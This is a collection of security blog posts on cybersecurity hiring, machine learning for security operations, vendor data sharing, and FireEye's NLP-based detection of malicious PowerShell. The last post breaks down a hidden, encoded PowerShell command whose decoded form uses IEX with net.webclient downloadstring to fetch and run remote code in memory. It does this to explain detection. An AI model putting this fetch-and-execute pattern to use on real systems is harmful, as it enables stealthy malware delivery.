According to Tripwire, there is some industry consensus on the most sought-after skills: Analytical thinking tops the list at 65 percent, followed by good communication (60 percent), troubleshooting (59 percent) and strong ethical behavior (58 percent). CIO calls out skills such as in-house customer service, a collaborative mindset and emotional intelligence.

Start Your Search for Soft Cybersecurity Skills

The rise of soft skills isn’t happening in a vacuum. As noted by a recent Capgemini study, “The talent gap in soft digital skills is more pronounced than in hard digital skills,” with 51 percent of companies citing a lack of hard digital skills and 59 percent pointing to a need for softer skill sets. CISOs must strive to create hiring practices that seek out soft-skilled applicants and a corporate culture that makes the best use of these skills.

When it comes to hiring, start by identifying a shortlist of skills that would benefit IT projects — these might include above-average communication, emotional aptitude or adaptability — then recruit with these skills in mind. This might mean tapping new collar candidates who lack formal certifications but have the drive and determination to work in cybersecurity. It also means designing an interview process that focuses on staff interaction and the ability of prospective employees to recognize and manage interpersonal conflict.

It’s also critical to create a plan for long-term retention. Enterprises must create IT environments that maximize employee autonomy and give staff the ability to implement real change. Just like hard skills, if soft skills aren’t used regularly they can decay over time — and employees won’t wait around if companies aren’t willing to change.

Cultivate Relationships Between Humans and Hardware

Just as IT certifications are adapting to meet the demands of new software, hardware and infrastructure, soft skills are also changing as technology evolves. Consider the rise of artificial intelligence (AI): Often portrayed positively as a key component of automated processes and negatively as an IT job stealer, there’s an emerging need for IT skills that streamline AI interaction and fill in critical performance gaps.

As noted by HR Technologist, tasks that require emotional intelligence are naturally resistant to AI. These include everything from delivering boardroom presentations to analyzing qualitative user feedback or assisting staff with cybersecurity concerns. Here, the human nature of soft skills provides their core value: Over time, these skills will set employees apart from their peers and organizations apart from the competition. Enterprises must also court professionals capable of communicating with AI tools and human colleagues with equal facility. These soft-centric characteristics position new collar employees as the bridge between new technologies and existing stakeholder expectations.

It’s Time to Prioritize Softer Skill Sets

There’s obviously solid value in soft skills — according to a study from the University of Michigan, these skills offer a 256 percent return on investment (ROI). For CISOs, the message is clear: It’s time to prioritize softer skill sets, re-evaluate hiring and recruitment practices, and prepare for a future where the hard skills of AI-enhanced technology require a soft balance to drive cybersecurity success.

The post Soft Skills, Solid Benefits: Cybersecurity Staffing Shifts Gears to Bring in New Skill Sets appeared first on Security Intelligence.

How to Choose the Right Artificial Intelligence Solution for Your Security Problems

Artificial intelligence (AI) brings a powerful new set of tools to the fight against threat actors, but choosing the right combination of libraries, test suites and trading models when building AI security systems is highly dependent on the situation. If you’re thinking about adopting AI in your security operations center (SOC), the following questions and considerations can help guide your decision-making.

What Problem Are You Trying to Solve?

Spam detection, intrusion detection, malware detection and natural language-based threat hunting are all very different problem sets that require different AI tools. Begin by considering what kind of AI security systems you need.

Understanding the outputs helps you test data. Ask yourself whether you’re solving a classification or regression problem, building a recommendation engine or detecting anomalies. Depending on the answers to those questions, you can apply one of four basic types of machine learning:

  1. Supervised learning trains an algorithm based on example sets of input/output pairs. The goal is to develop new inferences based on patterns inferred from the sample results. Sample data must be available and labeled. For example, designing a spam detection model by learning from samples labeled spam/nonspam is a good application of supervised learning.
  2. Unsupervised learning uses data that has not been labeled, classified or categorized. The machine is challenged to identify patterns through processes such as cluster analysis, and the outcome is usually unknown. Unsupervised machine learning is good at discovering underlying patterns and data, but is a poor choice for a regression or classification problem. Network anomaly detection is a security problem that fits well in this category.
  3. Semisupervised learning uses a combination of labeled and unlabeled data, typically with the majority being unlabeled. It is primarily used to improve the quality of training sets. For exploit kit identification problems, we can find some known exploit kits to train our model, but there are many variants and unknown kits that can’t be labeled. We can use semisupervised learning to address the problem.
  4. Reinforcement learning seeks the optimal path to a desired result by continually rewarding improvement. The problem set is generally small, and the training data well-understood. An example of reinforcement learning is a generative adversarial network (GAN), such as this experiment from Cornell University in which distance, measured in the form of correct and incorrect bits, is used as a loss function to encrypt messages between two neural networks and avoid eavesdropping by an unauthorized third neural network.

Artificial Intelligence Depends on Good Data

Machine learning is predicated on learning from data, so having the right quantity and quality is essential. Security leaders should ask the following questions about their data sources to optimize their machine learning deployments:

  • Is there enough data? You’ll need a sufficient amount to represent all possible scenarios that a system will encounter.
  • Does the data contain patterns that machine learning systems can learn from? Good data sets should have frequently recurring values, clear and obvious meanings, few out-of-range values and persistence, meaning that they change little over time.
  • Is the data sparse? Are certain expected values missing? This can create misleading results.
  • Is the data categorical or numeric in nature? This dictates the choice of the classifier we can use.
  • Are labels available?
  • Is the data current? This is particularly important in AI security systems because threats change so quickly. For example, a malware detection system that has been trained on old samples will have difficulty detecting new malware variations.
  • Is the source of the data trusted? You don’t want to train your model from publicly available data of origins you don’t trust. Data sample poisoning is just one attack vector through which machine learning-based security models are compromised.

Choosing the Right Platforms and Tools

There is a wide variety of platforms and tools available on the market, but how do you know which is the right one for you? Ask the following questions to help inform your choice:

  • How comfortable are you in a given language?
  • Does the tool integrate well with your existing environment?
  • Is the tool well-suited for big data analytics?
  • Does it provide built-in data parsing capabilities that enable the model to understand the structure of data?
  • Does it use a graphical or command-line interface?
  • Is it a complete machine learning platform or just a set of libraries that you can use to build models? The latter provides more flexibility, but also has a steeper learning curve.

What About the Algorithm?

You’ll also need to select an algorithm to employ. Try a few different algorithms and compare to determine which delivers the most accurate results. Here are some factors that can help you decide which algorithm to start with:

  • How much data do you have, and is it of good quality? Data with many missing values will deliver lower-quality results.
  • Is the learning problem supervised, unsupervised or reinforcement learning? You’ll want to match the data set to the use case as described above.
  • Determine the type of problem being solved, such as classification, regression, anomaly detection or dimensionality reduction. There are different AI algorithms that work best for each type of problem.
  • How important is accuracy versus speed? If approximations are acceptable, you can get by with smaller data sets and lower-quality data. If accuracy is paramount, you’ll need higher quality data and more time to run the machine learning algorithms.
  • How much visibility do you need into the process? Algorithms that provide decision trees show you clearly how the model reached a decision, while neural networks are a bit of a black box.

How to Train, Test and Evaluate AI Security Systems

Training samples should be constantly updated as new exploits are discovered, so it’s often necessary to perform training on the fly. However, training in real time opens up the risk of adversarial machine learning attacks in which bad actors attempt to disrupt the results by introducing misleading input data.

While it is often impossible to perform training offline, it is desirable to do so when possible so the quality of the data can be regulated. Once the training process is complete, the model can be deployed into production.

One common method of testing trained models is to split the data set and devote a portion of the data — say, 70 percent — to training and the rest to testing. If the model is robust, the output from both data sets should be similar.

A somewhat more refined approach called cross-validation divides the data set into groups of equal sizes and trains on all but one of the groups. For example, if the number of groups is “n,” then you would train on n-1 groups and test with the one set that is left out. This process is repeated many times, leaving out a different group for testing each time. Performance is measured by averaging results across all repetitions.

Choice of evaluation metrics also depends on the type of problem you’re trying to solve. For example, a regression problem tries to find the range of error between the actual value and the predicted value, so the metrics you might use include mean absolute error, root mean absolute error, relative absolute error and relative squared error.

For a classification problem, the objective is to determine which categories new observations belong in — which requires a different set of quality metrics, such as accuracy, precision, recall, F1 score and area under the curve (AUC).

Deployment on the Cloud or On-Premises?

Lastly, you’ll need to select a location for deployment. Cloud machine learning platforms certainly have advantages, such as speed of provisioning, choice of tools and the availability of third-party training data. However, you may not want to share data in the cloud for security and compliance reasons. Consider these factors before choosing whether to deploy on-premises or in a public cloud.

These are just a few of the many factors to consider when building security systems with artificial intelligence. Remember, the best solution for one organization or security problem is not necessarily the best solution for everyone or every situation.

The post How to Choose the Right Artificial Intelligence Solution for Your Security Problems appeared first on Security Intelligence.

Despite rise in security awareness, employees’ poor security habits are getting worse

Despite an increased focus on cybersecurity awareness in the workplace, employees’ poor cybersecurity habits are getting worse, compounded by the speed and complexity of the digital transformation. Of the 1,600 global employees Vanson

The post Despite rise in security awareness, employees’ poor security habits are getting worse appeared first on The Cyber Security Place.

Busting Cybersecurity Silos

Cybersecurity is among the most siloed disciplines in all of IT. The industry is exceedingly fragmented between many highly specialized companies. In fact, according to IBM estimates, the average enterprise uses 80 different products from 40 vendors. To put this in perspective, imagine a law enforcement officer trying to piece together the events surrounding a crime based solely on witness statements written in multiple languages — one in Chinese, another in Arabic, a third in Italian, etc. Security operations centers (SOCs) face a similar challenge all the time.

Security professionals are increasingly taking on the role of investigator, sorting through multiple data sources to track down slippery foes. Third-party integration tools don’t exist, so the customer is responsible for bringing together data from multiple sources and applying insights across an increasingly complex environment.

For example, a security team may need to coordinate access records with Lightweight Directory Access Protocol (LDAP) profiles, database access logs and network activity monitoring data to determine whether a suspicious behavior is legitimate or the work of an impostor. Security information may even need to be brought in from external sources such as social networks to validate an identity. The process is equivalent to performing a massive database join, but with incompatible data spread across a global network.

What Can We Learn About Collaboration From Threat Actors?

Organizations would be wise to observe the strategy of today’s threat actors, who freely share tactics, tools and vulnerabilities on the dark web, accelerating both the speed and impact of their attacks. As defenders of cybersecurity, we need to take a similar approach to sharing security information and building collaborative solutions that will address the evolving cybersecurity threat landscape.

This is easier said than done, as the cybersecurity industry has not been successful in enabling information to be shared, federated and contextualized in a way that drives effective security outcomes. But the barriers aren’t solely technical; corporate policies, customer privacy concerns and regulations all combine to inhibit information sharing. We must enable collaboration in ways that don’t undermine the interests of the collaborators.

Security information sharing is not only useful for threat management, but also for accurately determining IT risk, enabling secure business transformation, accelerating innovation, helping with continuous compliance and minimizing friction for end users. For example, organizations can leverage the identity context of an individual from multiple sources to evaluate the person’s reputation and minimize fraud for both new account creation and continuous transaction validation. This type of risk-based approach allows organizations to quickly support new initiatives, such as open banking application programming interfaces (APIs), and regulations, such as the European Union’s revised Payment Service Directive (PSD2).

The Keys to Building a Community Across Cybersecurity Silos

Sharing security data and insights and developing an ecosystem across cybersecurity silos is a transformational concept for the industry — one that requires people, process and technology adaptations. As organizations embrace secure digital transformations, security professionals need to adopt a risk-based approach to security management built on insights from several sources that include both technical and business contexts.

As security becomes more distributed within an organization, processes need to evolve to support integrated and collaborative operations. Sharing of data and insights will enable multiple business units to coordinate and deliver unified security. Technology needs to be API-driven and delivered as a service so it can integrate with others to facilitate sharing. Security solutions also need to evolve to deliver outcome-based security though capabilities that take advantage of data and insights from multiple vendors, platforms and locations.

The security industry is taking steps to address the complexity problem with standards designed to efficiently share data and insights. Standards such as STIX/TAXII, OpenC2 and CACAO are rapidly maturing and gaining adoption for their ability to enable vendors and their customers to choose what data to share. More than 50 cybersecurity vendors have adopted or plan to adopt STIX as a standard for data interchange, according to OASIS.

However, more work needs to be done. Standards and practices need to evolve to enable information sharing within and between industries, as well as ways to exchange methodologies, indicators of compromise (IoCs), response strategies and the like.

Finally, we need a cloud-based community platform that supports open standards-based collaboration for the delivery of integrated cybersecurity solutions. A platform-based approach will bring together people, process, tools, data and insights without expensive customization and integration projects. By increasing the adoption of such a platform, we can create a cybersecurity ecosystem that can address complexity, combat the evolving threat landscape and reduce the need for specialized security skills.

Bringing the Industry Together With IBM Security Connect

IBM has been on a journey to reduce complexity through a security immune system approach, enabling open collaboration through initiatives such as X-Force Exchange and Quad9, and driving open industry standards such as STIX/TAXII. We are furthering our commitment to strengthening cybersecurity with the recent announcement of IBM Security Connect, an open cloud platform for developing solutions based on distributed capabilities and federated data and insights.

Security Connect provides an open data integration service for sharing and normalizing threat intelligence, federated data searching across on-premises and cloud data repositories, and real-time sharing of security alerts, events and insights that can be leveraged by any integrated application or solution. This will pave the way for new methods of delivering innovative outcome-based security solutions powered by artificial intelligence (AI).

Clients and partners can take advantage of this open, cloud-native platform by combining their own data and insights with capabilities from IBM and other vendor technologies. We have already partnered with 15 major security software providers and look forward to adding more.

We are very excited about bringing this concept of data and insights collaboration to life, and grateful for the opportunity to bring cybersecurity silos together to reduce complexity and keep up with the evolving cybersecurity landscape. Early feedback has been gratifying, and we’d love to hear your comments and suggestions. I hope you will join us in this endeavor by learning more about IBM Security Connect and participating in the early field trial.

The post Busting Cybersecurity Silos appeared first on Security Intelligence.

Malicious PowerShell Detection via Machine Learning

Introduction

Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.

Background

PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).


Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.


Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).


Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates the following chunk of text is a base64 encoded command.

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.


Figure 4: The decoded command for the aforementioned example

Interestingly, the decoded command unveils a stealthy fileless network access and remote content execution!

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The downloadstring will download the contents from <url> into a memory buffer (which in turn IEX will execute).

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonym, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm will reduce the word to its original form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.


Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)

The overall NLP pipeline we developed is captured in the following table:

NLP Key Modules

Functionality

Decoder

Detect and decode any encoded text

Named Entity Recognition (NER)

Detect and recognize any entities such as IP, URL, Email, Registry key, etc.

Tokenizer

Tokenize the PowerShell command into a list of tokens

Stemmer

Stem tokens into semantically identical token, uses trie

Vocabulary Vectorizer

Vectorize the list of tokens into machine learning friendly format

Supervised classifier

Binary classification algorithms:

  • Kernel Support Vector Machine
  • Gradient Boosted Trees
  • Deep Neural Networks

Reasoning

The explanation of why the prediction was made. Enables analysts to validate predications.

The following are the key steps when streaming the aforementioned example through the NLP pipeline:

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model


Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command

More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.


Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.

Acknowledgements

We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.